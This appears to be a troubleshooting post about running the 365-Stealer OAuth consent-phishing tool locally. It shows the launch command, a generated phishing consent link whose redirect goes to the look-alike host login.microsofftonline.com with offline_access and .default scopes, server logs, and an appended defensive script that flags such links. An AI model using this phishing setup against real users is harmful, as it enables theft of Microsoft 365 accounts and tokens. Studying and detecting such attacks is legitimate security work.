Hi,
When the app is run and the phishing is sent locally, a 400 error appears and consent is accepted. The malicious app has the URI "https://login.microsofftonline.com:4443/login/authorized" and the DNS points to login.microsofftonline.com on localhost.
C:\xampp\htdocs\365-Stealer-master>python 365-Stealer.py --run-app --port 4443
Credit: o365-Attack-Toolkit Author: @trouble1_raunak
Github: https://github.com/alteredsecurity/365-Stealer
[!] Stealing processes delayed with 1 seconds.
Phishing Link => https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=xxxxxxx-xx-xxx-xxxx-398ed37e09e1&scope=https%3A%2F%2Fgraph.microsoft.com%2F.default+openid+offline_access+&redirect_uri=https%3A%2F%2Flogin.microsofftonline.com%3A4443%2Flogin%2Fauthorized&response_mode=query
Home page running on port: 4443
* Serving Flask app '365-Stealer'
* Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on https://127.0.0.1:4443
* Running on https://192.168.56.73:4443
Press CTRL+C to quit
Error: 400 Bad Request: The browser (or proxy) sent a request that this server could not understand.
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /login/authorized HTTP/1.1" 302 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/bootstrap/css/bootstrap.min.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/aos/aos.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/css/style.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/jquery/jquery.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/venobox/venobox.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/icofont/icofont.min.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/animate.css/animate.min.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/bootstrap/js/bootstrap.bundle.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/owl.carousel/assets/owl.carousel.min.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/boxicons/css/boxicons.min.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/jquery.easing/jquery.easing.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/php-email-form/validate.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/jquery-sticky/jquery.sticky.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/venobox/venobox.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/waypoints/jquery.waypoints.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/counterup/counterup.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/owl.carousel/owl.carousel.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/isotope-layout/isotope.pkgd.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/aos/aos.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/js/main.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/img/about.jpg HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/img/slide/slide-1.jpg HTTP/1.1" 304 -
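A defender-side check for consent links like the one in the output above, as an added example that is not part of the original issue or the project's code: it parses an OAuth authorize URL and flags a redirect host that closely imitates a Microsoft sign-in host, a non-standard redirect port, and the `offline_access` and `.default` scopes. The trusted-host list, the function names and the distance threshold are assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption: hosts treated as genuine Microsoft sign-in endpoints for this check.
TRUSTED_LOGIN_HOSTS = ("login.microsoftonline.com", "login.live.com")

# Consent link copied from the tool output in the issue (client_id is redacted there).
SAMPLE_URL = (
    "https://login.microsoftonline.com/common/oauth2/authorize?response_type=code"
    "&client_id=xxxxxxx-xx-xxx-xxxx-398ed37e09e1"
    "&scope=https%3A%2F%2Fgraph.microsoft.com%2F.default+openid+offline_access+"
    "&redirect_uri=https%3A%2F%2Flogin.microsofftonline.com%3A4443%2Flogin%2Fauthorized"
    "&response_mode=query"
)


def edit_distance(a, b):
    """Levenshtein distance, used to spot near-miss host names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def review_consent_url(url, max_distance=2):
    """Return a list of findings for an OAuth authorize URL (hypothetical helper)."""
    query = parse_qs(urlsplit(url).query)  # also decodes %xx and '+'
    redirect = urlsplit(query.get("redirect_uri", [""])[0])
    host = (redirect.hostname or "").lower()
    scopes = set(query.get("scope", [""])[0].split())
    findings = []
    for trusted in TRUSTED_LOGIN_HOSTS:
        # Distance 0 is the trusted host itself; a small non-zero distance is a look-alike.
        if 0 < edit_distance(host, trusted) <= max_distance:
            findings.append(f"redirect host {host!r} imitates {trusted!r}")
    if redirect.port not in (None, 443):
        findings.append(f"redirect uses non-standard port {redirect.port}")
    if "offline_access" in scopes:
        findings.append("requests offline_access (refresh token)")
    if any(s.endswith("/.default") for s in scopes):
        findings.append("requests .default (all permissions configured on the app)")
    return findings


if __name__ == "__main__":
    for finding in review_consent_url(SAMPLE_URL):
        print("[!]", finding)
```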